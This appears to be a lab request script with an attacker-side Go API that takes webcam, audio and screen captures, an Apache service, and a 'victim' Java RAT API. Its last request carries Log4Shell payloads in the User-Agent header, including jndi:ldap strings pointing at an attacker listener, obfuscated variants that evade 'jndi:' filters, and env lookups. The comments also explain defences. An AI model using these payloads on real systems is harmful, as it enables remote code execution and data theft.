requester.py
###env
# Base URLs shared by every request in this file. All targets are private
# (RFC 1918) 192.168.x.x addresses reached over plain http://, so request and
# response bodies travel unencrypted.
# red_url is the host this file labels RED; go_url and apache2_url are two
# services on that same host, told apart only by port (2080 and 2022).
red_url = 'http://192.168.113.9'
# Host and port that the "Java RAT API" requests are addressed to.
victim_url = 'http://192.168.113.13:58860'
go_url = red_url + ':2080'
apache2_url = red_url + ':2022'
###env
#// RED |
### Go API |
### ----------- |
# Requests against the service at go_url. None of them sends a credential or
# token. NOTE(review): unless the API enforces access control some other way,
# the capture and properties endpoints are open to anything that can reach the
# port -- confirm.
get(go_url + '/'); # GET root endpoints
get(go_url + '/captures'); # GET captures
# Sample upload. TYPE and EXTENSION hold slash-separated alternatives rather
# than one value -- presumably a template to edit before sending; verify
# against the API. The BASE32 value decodes to the text "SAMPLE" plus a
# newline, i.e. dummy content rather than a real capture.
post(go_url + '/captures', json = { # POST captures
"TYPE":"WEBCAM/AUDIO/SCREEN",
"TITLE":"SAMPLE",
"TIMESTAMP":"07/14/22 12:59:02",
"ENCODING":
{
"EXTENSION": "jpeg/wav/png",
"BASE32":"KNAU2UCMIUFA===="
}
});
get(go_url + '/properties'); # GET properties
# Updates the service's properties. NOTE(review): HOST here is 192.168.159.9,
# a different subnet from go_url's host (192.168.113.9) -- confirm which
# address is current. The three empty strings are sent as-is; whether the API
# reads "" as "leave unchanged" or "clear the value" is not visible here.
patch(go_url + '/properties', json = { # PATCH properties
"HOST": "192.168.159.9",
"PORT_JAVA_HTTP": "",
"PORT_LISTENER": "",
"SHELL": ""
});
### Apache2 HTTP |
### ------------ |
# Plain GET of the web root on the second service (apache2_url).
get(apache2_url + '/'); # GET root
#// VICTIM |
### Java RAT API |
### ----------- |
# Baseline request: no headers argument, so the client's defaults are sent.
get(victim_url); # GET root payload
# Same request with a User-Agent written in Log4j 2 lookup syntax. Only the
# last 'User-Agent' entry is active; the commented lines are alternatives.
# Read from the defender's side they fall into three groups:
#   - ${java:...} / ${env:...}: would resolve to runtime or environment data
#     if the receiving application logs the header with lookups enabled;
#   - ${jndi:ldap://...}: would make the logging host open an outbound LDAP
#     connection (port 2038 in these strings);
#   - nested ${lower:...}, ${::-x} and ${name:-x} forms: resolve to the same
#     jndi:ldap string without containing it literally, so log or WAF rules
#     that match only the plain substring "jndi:" do not catch them.
# Presumably the target logs this header through Log4j -- not visible here.
# Controls that cover every variant: a Log4j release with message lookups and
# JNDI disabled, plus egress filtering so the server cannot reach arbitrary
# LDAP hosts.
# NOTE(review): the commented jndi variants point at 192.168.159.9 while the
# active one points at 192.168.113.9 -- confirm which listener is intended.
get(victim_url, headers = { # GET root payload (custom header)
# 'User-Agent': '${java:runtime}'
# 'User-Agent': '${java:version}'
# 'User-Agent': '${env:PATH}'
# 'User-Agent': '${jndi:ldap://192.168.159.9:2038/cn=1807422020,dc=attacker,dc=com}'
# 'User-Agent': '${${lower:${lower:jndi}}:${lower:${::-l}${::-d}${::-a}${::-p}}://192.168.159.9:2038/cn=1807422020,dc=attacker,dc=com}'
'User-Agent': '${${env:PATH_DUMMY:-j}nd${sys:SYS_DUMMY:-i}:${lower:${::-l}${::-d}${::-a}${::-p}}://192.168.113.9:2038/cn=1807422020,dc=attacker,dc=com}'
});